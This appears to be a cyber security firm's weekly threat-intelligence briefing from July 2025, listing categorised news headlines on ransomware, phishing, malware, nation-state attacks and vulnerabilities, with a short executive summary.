UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent

UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek

Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine

AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine

Ransomware gang attacking NAS devices taken down in major police operation | TechRadar

CISA and FBI warn of escalating Interlock ransomware attacks

Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine

Storm-2603 spotted deploying ransomware on exploited SharePoint servers - Help Net Security

Worry about the basics of ransomware, not the AI threat - Tech Monitor

BlackSuit ransomware extortion sites seized in Operation Checkmate

New Phobos and 8base ransomware decryptor recover files for free

Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International

Ransomware Victims

Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit

158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password

‘If you’re reading this, your company is dead’: How one weak password ended a 158-year-old business - The Economic Times

Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar

Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine

The password that sank a 158-year-old business - IT Security Guru

Major European healthcare network discloses security breach

Two more entities have folded after ransomware attacks – DataBreaches.Net

Russian alcohol retailer WineLab closes stores after ransomware attack

Phishing & Email Based Attacks

University student who sold more than a thousand phishing kits to fraudsters is jailed | ITV News London

Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica

'PoisonSeed' Attacker Skates Around FIDO Keys

UK ties GRU to stealthy Microsoft 365 credential-stealing malware

Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine

That “credit card security” email might be a trap | Cybernews

Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques

Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide

Other Social Engineering

Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit

Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide

Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine

Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware

Dark Web Hackers Moonlight as Travel Agents

US Targets North Korea's Illicit Funds: $15M Rewards Offered as American Woman Jailed in IT Worker Scam - SecurityWeek

Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak

I am a cyber security pro and here's the most powerful strategy criminals are using against retailers right now | TechRadar

Fraud, Scams and Financial Crime

Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide

This fake checkout page looks real - until your card info is sent to hidden servers in plain sight | TechRadar

Former charity site now pushes gambling links, and ChatGPT thinks it’s still a trusted source | TechRadar

Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine

UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine

Coyote malware abuses Microsoft UIA to hunt banking creds • The Register

Fake Receipt Generators Fuel Rise in Online Fraud - Infosecurity Magazine

Return Fraud Is Rampant Thanks to Free Shipping, Customer Behavior - Business Insider

The fraud trends shaping 2025: Pressure builds on online retailers - Help Net Security

Head of AI company warns of AI fraud | The Independent

'Explosive growth' in number of Channel Island fraud complaints - Island FM

$17 Million Is Lost in ATM Scam That Spread on TikTok, Officials Say - The New York Times

Artificial Intelligence

How to Fight and Detect AI Virus: First-ever AI malware ‘LazyHug’ hides in ZIP files to hack Windows PCs

68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine

Former charity site now pushes gambling links, and ChatGPT thinks it’s still a trusted source | TechRadar

AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine

Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine

How AI is changing the GRC strategy | CSO Online

People don't trust AI but they're increasingly using it anyway | ZDNET

Image watermarks meet their Waterloo with UnMarker • The Register

Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine

3 Ways Security Teams Can Minimize Agentic AI Chaos

How the EU Is Fighting Back Against Deepfakes - IT Security Guru

Hacker slips malicious 'wiping' command into Amazon's Q AI coding assistant - and devs are worried | ZDNET

Nearly 2,000 MCP Servers Possess No Security Whatsoever

Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews

Worry about the basics of ransomware, not the AI threat - Tech Monitor

WeTransfer ToS adding 'machine learning' caused freakout • The Register

2FA/MFA

Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica

'PoisonSeed' Attacker Skates Around FIDO Keys

Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques

Veeam Recovery Orchestrator users locked out after MFA rollout

Malware

How to Fight and Detect AI Virus: First-ever AI malware ‘LazyHug’ hides in ZIP files to hack Windows PCs

Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine

UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense

UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine

CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign

Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek

Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews

Coyote malware abuses Microsoft UIA to hunt banking creds • The Register

Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine

Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware

New Malware-as-a-Service Operation Abuses GitHub Repositories to Deploy Infostealers Like Lumma and Amadey

A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors

NCSC: Russian malware controls emails | Cybernews

Gaming mouse maker infected users with malware for weeks, then quietly replaced files without warning | Tech News

Hackers breach Toptal GitHub account, publish malicious npm packages

npm phishing attack laces popular packages with malware • The Register

Stealth backdoor found in WordPress mu-Plugins folder

Cyber criminals are Targeting US Businesses with Malicious USB Drives: By Robert Siciliano

Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak

Arch Linux pulls AUR packages that installed Chaos RAT malware

Warning: Hacker Might Be Prepping This Steam Game to Spread Malware

Threat Actors Weaponizing .hwp Files to Deliver RokRAT Malware

Bots/Botnets

AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine

Mobile

Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge

Here's What Phone Thieves Do to Prevent You From Tracking Your Device

5M Public, Unsecured Wi-Fi Networks Found Exposed | Security Magazine

This attack could give criminals control of your mobile or desktop browser - PhoneArena

Surveillance Firm Bypasses SS7 Protections to Retrieve User Location - SecurityWeek

MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict

China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones

Internet of Things – IoT

Your office printer could be the easiest backdoor into company networks - so update now | TechRadar

Is your Ring camera showing strange logins? Here's what's going on | ZDNET

Ring tries to explain 'May 28' bug, but users aren't buying it - Android Authority

Enterprise printer security fails at every stage - Help Net Security

Update your printer! Over 700 models actively being attacked by hackers | PCWorld

When Your Power Meter Becomes a Tool of Mass Surveillance | Electronic Frontier Foundation

Data Breaches/Leaks

Startup takes personal data stolen by malware and sells it on to other companies | Malwarebytes

Most data breaches have unknown causes as transparency continues to fall - Help Net Security

A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors

68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine

Holyrood | No evidence of data loss in Glasgow City Council cyber-attack, experts say

Inquiry after SAS identities leaked in new breach

Regulator Claims 9,000+ Clients' Data Hit Dark Web in Security Breach

Risika Data Breach Exposes 100M Swedish Records to Fraud Risks

Hackers didn’t get your password, but they may have gotten enough to launch the next big phishing storm | TechRadar

France: New Data Breach Could Affect 340,000 Jobseekers - Infosecurity Magazine

People are getting over $4,000 from the T-Mobile data breach settlement

Dior begins sending data breach notifications to US customers

Dell scoffs at breach, says miscreants stole ‘fake data' • The Register

750,000 Impacted by Data Breach at The Alcohol & Drug Testing Service - SecurityWeek

Marketing, Law Firms Say Data Breaches Impact Over 200,000 People - SecurityWeek

Data breach feared after cyber attack on AMEOS hospitals in Germany – DataBreaches.Net

Major German media group falls victim to hacker attack – DW – 07/22/2025

1.4 Million Affected by Data Breach at Virginia Radiology Practice - SecurityWeek

Organised Crime & Criminal Actors

Dark Web Hackers Moonlight as Travel Agents

Europol Sting Leaves Russian 'NoName057(16)' Group Fractured

Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine

New Wave of Crypto-Hijacking Infects 3,500+ Websites

3,500 Websites Hijacked to Secretly Mine Crypto Using Stealth JavaScript and WebSocket Tactics

Insider Risk and Insider Threats

Most cyber risks driven by few employees, study shows | SC Media

Supply Chain and Third Parties

Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit

Firmware Vulnerabilities Continue to Plague Supply Chain

At Least 750 US Hospitals Faced Disruptions During Last Year’s CrowdStrike Outage, Study Finds | WIRED

Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA

Sean Plankey vows to boot China from US supply chain, advocate for CISA budget

Cloud/SaaS

Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine

UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday

UK blames Russia’s infamous ‘Fancy Bear’ group for Microsoft cloud hacks | CSO Online

Outages

At Least 750 US Hospitals Faced Disruptions During Last Year’s CrowdStrike Outage, Study Finds | WIRED

Phone networks down: EE, BT, Three, and Vodafone all not working in mass outage | The Independent

Tens of thousands knocked offline after software failure at Musk’s Starlink | Elon Musk | The Guardian

Alaska’s system-wide ground stop ‘not a cyber security event’ | News | Flight Global

Has the media industry learned from the Crowdstrike outage? - TVBEurope

Encryption

UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors

Linux and Open Source

Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews

How unvalidated code is putting UK national security at risk - Tech Monitor

Digital sovereignty becomes a matter of resilience for Europe - Help Net Security

Arch Linux pulls AUR packages that installed Chaos RAT malware

Passwords, Credential Stuffing & Brute Force Attacks

158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Weak Password

‘If you’re reading this, your company is dead’: How one weak password ended a 158-year-old business - The Economic Times

UK ties GRU to stealthy Microsoft 365 credential-stealing malware

The password that sank a 158-year-old business - IT Security Guru

Hard-Coded Credentials Found in HPE Instant On Devices Allow Admin Access

New QR Code Attack Via PDFs Evades Detection Systems and Harvest Credentials

Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA

Hackers scanning for TeleMessage Signal clone flaw exposing passwords

Regulations, Fines and Legislation

UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine

UK moves forward with plans for mandatory reporting of ransomware attacks | The Record from Recorded Future News

UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent

UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek

Monzo’s £21m fine highlights banks’ cyber security failures | Computer Weekly

Six months into DORA, most financial firms are still not ready - Help Net Security

UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors

ENISA Turns to Experts to Steer EU Cyber Regulations

Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks

UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday

Sean Plankey vows to boot China from US supply chain, advocate for CISA budget

Government responds to feedback on ransomware consultation | Practical Law

After website hack, Arizona election officials unload on Trump’s CISA | CyberScoop

Models, Frameworks and Standards

Six months into DORA, most financial firms are still not ready - Help Net Security

Careers, Working in Cyber and Information Security

AI is here, but you still need juniors, say cyber security pros | Cybernews

How to Advance from SOC Manager to CISO?

How to Build a Cyber Security Team to Maximize Business Impact

How to land your first job in cyber security - Help Net Security

Gen Z has replaced traditional job searching with TikTok—70% are finding career advice on social media | Fortune

Law Enforcement Action and Take Downs

Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek

Europol targets Kremlin-backed cyber crime gang NoName057(16)

Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace

UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine

US Targets North Korea's Illicit Funds: $15M Rewards Offered as American Woman Jailed in IT Worker Scam - SecurityWeek

University student who sold more than a thousand phishing kits to fraudsters is jailed | ITV News London

Ransomware gang attacking NAS devices taken down in major police operation | TechRadar

Operator of Jetflicks illegal streaming service gets 7 years in prison

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine

NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review

UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine

NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte

Russian sabotage attacks surged across Europe in 2024

Russian trawlers threaten vital undersea cables in Atlantic

Europe cyber attacks surge amid geopolitical tensions | Cybernews

UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net

UK uncovers novel Microsoft snooping malware, blames GRU • The Register

NCSC: Russian malware controls emails | Cybernews

Rising Russian Espionage Activity in Germany: Timing, Tactics, and Threats - Robert Lansing Institute

Why it's time for the US to go on offense in cyber space | CyberScoop

Recovery IS strength: The test of American cyber power | SC Media

China-Backed APT41 Attack Surfaces in Africa

China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure

Opinion | To fight cyberwar, the US must establish a tech academy - The Washington Post

Nation State Actors

Europe cyber attacks surge amid geopolitical tensions | Cybernews

How Can Companies Guard Against Rising Nation-State Cyber Threats? | Phelps Dunbar - JDSupra

China

3 China Nation-State Actors Target SharePoint Bugs

US nuclear weapons agency ‘among 400 organisations breached by Chinese hackers’ | Microsoft | The Guardian

Stealthy cyber spies linked to China compromising virtualization software globally | The Record from Recorded Future News

Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks

Sean Plankey vows to boot China from US supply chain, advocate for CISA budget

China-Backed APT41 Attack Surfaces in Africa

China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure

China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones

Singapore warns China-linked group UNC3886 targets its critical infrastructure

China warns of backdoored devices, on land and under the sea • The Register

Russia

NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review

UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine

NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte

British institutions to be banned from paying ransoms to Russian hackers – POLITICO

UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense

Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine

Russian sabotage attacks surged across Europe in 2024

Russian trawlers threaten vital undersea cables in Atlantic

Europol Sting Leaves Russian 'NoName057(16)' Group Fractured

UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday

UK ties GRU to stealthy Microsoft 365 credential-stealing malware

CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign

UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net

Rising Russian Espionage Activity in Germany: Timing, Tactics, and Threats - Robert Lansing Institute

Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace

"May reduce Gazprom's capacity and share value": source revealed details of DIU cyber attack on Russian gas monopolist | УНН

Operation CargoTalon Attacking Russian Aerospace & Defence to Deploy EAGLET Implant

Russian alcohol retailer WineLab closes stores after ransomware attack

Iran

MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict

Iran-Linked DCHSpy Android Malware Masquerades as VPN Apps to Spy on Dissidents

Iranian Hackers Deploy New Android Spyware Version - Infosecurity Magazine

Will An Iran Cyber Attack Panic Usher In A New Patriot Act? – OpEd – Eurasia Review

Ex-IDF cyber chief talks Iran, Scattered Spider with The Reg • The Register

Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International

North Korea

Europe cyber attacks surge amid geopolitical tensions | Cybernews

US Targets North Korea's Illicit Funds: $15M Rewards Offered as American Woman Jailed in IT Worker Scam - SecurityWeek

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

From Missiles to Malware: India-Pakistan Cyber Rivalry and Lessons for Taiwan – Taiwan Insight

Tools and Controls

Ransomware gang attacking NAS devices taken down in major police operation | TechRadar

AI is here, but you still need juniors, say cyber security pros | Cybernews

As AI tools take hold in cyber security, entry-level jobs could shrink - Help Net Security

Firmware Vulnerabilities Continue to Plague Supply Chain

Your office printer could be the easiest backdoor into company networks - so update now | TechRadar

Enterprise printer security fails at every stage - Help Net Security

Update your printer! Over 700 models actively being attacked by hackers | PCWorld

Majority of CISOs Lack Full Visibility Over APIs - IT Security Guru

How to harden your Active Directory against Kerberoasting

What Makes Great Threat Intelligence?

How to Use Threat Intelligence to Enhance Cyber Security Operations

DNS security is important but is DNSSEC a failed experiment? • The Register

Veeam Recovery Orchestrator users locked out after MFA rollout

Hacker injects malicious, potentially disk-wiping prompt into Amazon's AI coding assistant with a simple pull request — told 'Your goal is to clean a system to a near-factory state and delete file-system and cloud resources' | Tom's Hardware

3 Ways Security Teams Can Minimize Agentic AI Chaos

Hacker slips malicious 'wiping' command into Amazon's Q AI coding assistant - and devs are worried | ZDNET

Reclaiming Control: How Enterprises Can Fix Broken Security Operations - SecurityWeek

Your app is under attack every 3 minutes - Help Net Security

Stealthy cyber spies linked to China compromising virtualization software globally | The Record from Recorded Future News

China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones

Other News

What To Know About Dangerous Airport And Airline Cyber Attacks, And Why They're On The Rise

Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine

Summer habits could increase cyber risk to enterprise data - Data Centre & Network News

From beaches to breaches: Summer work habits put enterprise data at risk - Digital Journal

NATO warns ports vulnerable to 'unprecedented' cyber threats - FreightWaves

Meta and Google are laying a fast-growing web of mega subsea cables

Ports are getting smarter and more hackable - Help Net Security

Coast Guard Issues Cyber Rule for Maritime Transport Safety

World Health Organisation CISO on securing global health emergencies - Help Net Security

Loaf and order: Belgian police launch bread-based cyber security campaign • Graham Cluley

Basic cyber security lapses are leaving US infrastructure exposed, top experts warn - Nextgov/FCW

How did Stuxnet impact cyber operations? The US House aims to find out | SC Media

Vulnerability Management

From hardcoded credentials to auth gone wrong: Old bugs continue to break modern systems | CSO Online

Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED

Update your printer! Over 700 models actively being attacked by hackers | PCWorld

How quickly do we patch? A quick look from the global viewpoint - SANS Internet Storm Center

VMware portal prevents some users from downloading patches • The Register

Vulnerabilities

Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED

SharePoint victim count hits 400+ orgs in ongoing attacks • The Register

US nuclear weapons agency ‘among 400 organisations breached by Chinese hackers’ | Microsoft | The Guardian

Microsoft says some SharePoint hackers now using ransomware | Reuters

CitrixBleed 2: 100 Organisations Hacked, Thousands of Instances Still Vulnerable - SecurityWeek

Microsoft fixes two SharePoint zero-days under attack, but it's not over - how to patch | ZDNET

NCSC says ‘limited number’ of UK firms affected by SharePoint attack as global impact spreads | IT Pro

Cisco confirms active exploitation of ISE and ISE-PIC flaws

Hardcoded credentials found in HPE Aruba Instant On Wi-Fi devices

Critical Vulnerabilities Patched in Sophos Firewall - SecurityWeek

SonicWall Patches Critical SMA 100 Vulnerability, Warns of Recent Malware Attack - SecurityWeek

Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques

Microsoft mistakenly tags Windows Firewall error log bug as fixed

New 7-Zip Vulnerability Enables Malicious RAR5 File to Crash Your System

Hackers are breaking into critical servers used by global giants, and it only takes one line of code | TechRadar

Another massive security snafu hits Microsoft • The Register

High-Severity Flaws Patched in Chrome, Firefox - SecurityWeek

Critical Mitel Flaw Lets Hackers Bypass Login, Gain Full Access to MiVoice MX-ONE Systems

Critical NVIDIA Container Toolkit Flaw Allows Privilege Escalation on AI Cloud Services

Hackers Exploit Critical CrushFTP Flaw to Gain Admin Access on Unpatched Servers

VMware portal prevents some users from downloading patches • The Register

CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 20/07/2025 Black Arrow Admin 20/07/2025

Black Arrow Cyber Threat Intelligence Briefing 18 July 2025

Black Arrow Cyber Threat Intelligence Briefing 18 July 2025:

-Most Cyber Security Risk Comes from Just 10% of Employees

-Stop Settling for Check-the-Box Cyber Security Policies

-A New, Silent Social Engineering Attack Is Being Used by Hackers; Your Security Systems Might Not Notice Until It’s Too Late

-Firms Have a Fake North Korean IT Worker Problem – Here’s How to Stop It

-Orgs and Individuals Clinging to Windows 10 Face Heightened Risk, Says NCSC

-Supplier Risk Is Breaking the Size Myth in Cyber

-Most European Financial Firms Still Lagging on DORA Compliance

-AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks

-Ransomware Surges 63% in Q2

-All 6.5m Co-Op Members Had Data Stolen in Recent Cyber Attack, Retailer Admits

-North Korean Hackers Blamed for Record Spike in Crypto Thefts in 2025

-Russia Shifts Cyber War Focus from US to UK Following Trump’s Election

-Europol Disrupts Major Network of Russian-Speaking Cyber Criminals Targeting Ukraine and Its Allies

Executive Summary

In our briefing this week, and continuing our opening theme from last week, we share research insights that just 10% of employees account for nearly three quarters of all risky behaviour in the workplace, and the need to have cyber security policies that reflect the realities of the workplace and create a security culture. We also report on a new social engineering tactic that encourages employees to run malicious code for the attacker. Other employee risks continue to evolve, including the insider risk of recruiting North Korean IT workers who access sensitive data and extort the employer.

We highlight actions that organisations should focus on now: these include upgrading to Windows 11; managing the risks in their supply chain; and for those organisations in scope, progressing their compliance for DORA. We also highlight the evolving risk of AI cloaking tools, and the surge in ransomware. The consequences of attacks are emphasised by the breach of 6.5m customer records at the UK retailer Co-Op, and a record spike in crypto thefts by North Koreans. Finally, we include news of Russian state and citizen attackers focusing on the UK and Ukraine-aligned countries.

Governance, Risk and Compliance

Most cyber security risk comes from just 10% of employees - Help Net Security

Compliance is evolving — Is your resilience ready? | TechRadar

True cyber resilience comes from culture | BFI

Factoring Cyber Security Into Finance's Digital Strategy

Major brands face 'treacherous' cyber security landscape and rising threats, experts warn | Fox Business

Turning Cyber Risk Into Boardroom Metrics That Matter

How to Calculate Cyber Security ROI for CEOs and Boards | TechTarget

Stop settling for check-the-box cyber security policies - Help Net Security

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware surges 63 percent in Q2 - BetaNews

Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools

Qilin Emerged as The Most Active Group, Exploiting Unpatched Fortinet Vulnerabilities - Cyber Security News

Nearly one-third of Irish firms paid a cyber ransom in last year

Wiper Malware: The Threat to Businesses | SC Media UK

French and UK Authorities Arrest Suspects in Ransomware Cases

Interlock ransomware adopts FileFix method to deliver malware

Interlock Ransomware Unleashes New RAT in Widespread Campaign - Infosecurity Magazine

Police disrupt “Diskstation” ransomware gang attacking NAS devices

Anatomy of a Scattered Spider attack: A growing ransomware threat evolves | CSO Online

Retail Ransomware Attacks Jump 58% Globally in Q2 2025 - Infosecurity Magazine

Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop

Microsoft Exposes Scattered Spider’s Latest Tactics - Infosecurity Magazine

Report: Global retail ransomware intrusions surge | SC Media

Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals

Ransomware Victims

All 6.5m Co-op members had their data stolen in cyber attack earlier this year, retailer admits | This is Money

Report: Global retail ransomware intrusions surge | SC Media

Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion

Some Glasgow City Council online services still down | Glasgow Times

M&S resumes online recruitment following cyber attack - Retail Gazette

United Natural Foods Expects $400M revenue impact from June cyber attack

Russian vodka producer reports disruptions after ransomware attack | The Record from Recorded Future News

Phishing & Email Based Attacks

A new, silent social engineering attack is being used by hackers – and your security systems might not notice until it’s too late | IT Pro

Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media

13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek

Hackers Can Hide Malicious Code in Gemini's Email Summaries

Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority

Preventing Zero-Click AI Threats: Insights from EchoLeak | Trend Micro (US)

Other Social Engineering

A new, silent social engineering attack is being used by hackers – and your security systems might not notice until it’s too late | IT Pro

How deepfake AI job applicants are stealing remote work

Fake North Korean IT workers: How companies can stop them • The Register

What an SMS blaster is, and how to protect yourself from malicious SMS messages while traveling | Kaspersky official blog

How North Korea infiltrates its IT experts into Western companies

Fraud, Scams and Financial Crime

Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine

Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews

Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine

SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million

Artificial Intelligence

AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks - Infosecurity Magazine

Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools

One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine

AI adoption is booming but secure scaling not so much - Help Net Security

Grok-4 Falls to a Jailbreak Two days After Its Release - SecurityWeek

Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding

90% of Large Organisations Unprepared for AI-Enabled Threats | Security Magazine

Cyber Security Bosses Fretting About AI Attacks and Misuse

Researcher tricks ChatGPT into revealing security keys - by saying "I give up" | TechRadar

DeepSeek a threat to national security, warns Czech cyber agency | The Record from Recorded Future News

For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET

GPUHammer: New RowHammer Attack Variant Degrades AI Models on NVIDIA GPUs

Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority

From Vibe Coding To Vibe Hacking — AI In A Hoodie

Curl creator mulls nixing bug bounty awards to stop AI slop • The Register

Malware

Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media

Hackers hide dangerous Mac trojan in legit apps | Cybernews

WordPress Gravity Forms developer hacked to push backdoored plugins

AI-Trained Malware Evades Microsoft Defender 8% of the Time, Researchers Warn – Tehrani.com – Tehrani on Tech

Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences

Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica

Malware found embedded in DNS, the system that makes the internet usable, except when it doesn't | Tom's Hardware

Google sues 25 alleged BadBox 2.0 botnet operators • The Register

AsyncRAT Spawns a Labyrinth of Forks

North Korean XORIndex malware hidden in 67 malicious npm packages

Threat hunting case study: Lumma infostealer | Intel 471

Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security

Bots/Botnets

Google sues 25 alleged BadBox 2.0 botnet operators • The Register

Mobile

What an SMS blaster is, and how to protect yourself from malicious SMS messages while traveling | Kaspersky official blog

Spyware on Androids Soars - Security Boulevard

Hackers Love These 7 Screenshots You Keep in Your Gallery

Android Malware Konfety evolves with ZIP manipulation and dynamic loading

Don’t Tap That Notification—This Is How Malware Sneaks Onto Smartphones

SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million

July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek

Altered Telegram App Steals Chinese Users' Android Data

Denial of Service/DoS/DDoS

DDoS peaks hit new highs: Cloudflare mitigated massive 7.3 Tbps assault

Averted DDoS attacks spike, report finds | SC Media

Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group

Internet of Things – IoT

Your Mercedes or VW could get hacked via Bluetooth | PCWorld

350M Cars, 1B Devices Exposed to 1-Click Bluetooth RCE

Uncovering the Cyber Security Risk in Smart Meter Data Storage | SC Media UK

Neglecting printer security is leaving you wide open to cyber attacks | IT Pro

Printer Security Gaps: A Broad, Leafy Avenue to Compromise

Data Breaches/Leaks

All 6.5m Co-op members had their data stolen in cyber attack earlier this year, retailer admits | This is Money

'123456' password exposed chats for 64 million McDonald’s job applicants

US Data Breaches Head for Another Record Year After 11% Surge - Infosecurity Magazine

Spies and SAS personnel among 100-plus Britons included in Afghan data leak | Defence policy | The Guardian

How top military chief’s role in Afghan data leak was hidden

The Afghan data breach has already cost millions. What happens next?

Louis Vuitton says UK customer data stolen in cyber-attack | Cybercrime | The Guardian

Paddy Power and BetFair have suffered a data breach • Graham Cluley

Waltz brushes off SignalGate questions, points finger at CISA | CyberScoop

Data Breach at Debt Settlement Firm Impacts 160,000 People - SecurityWeek

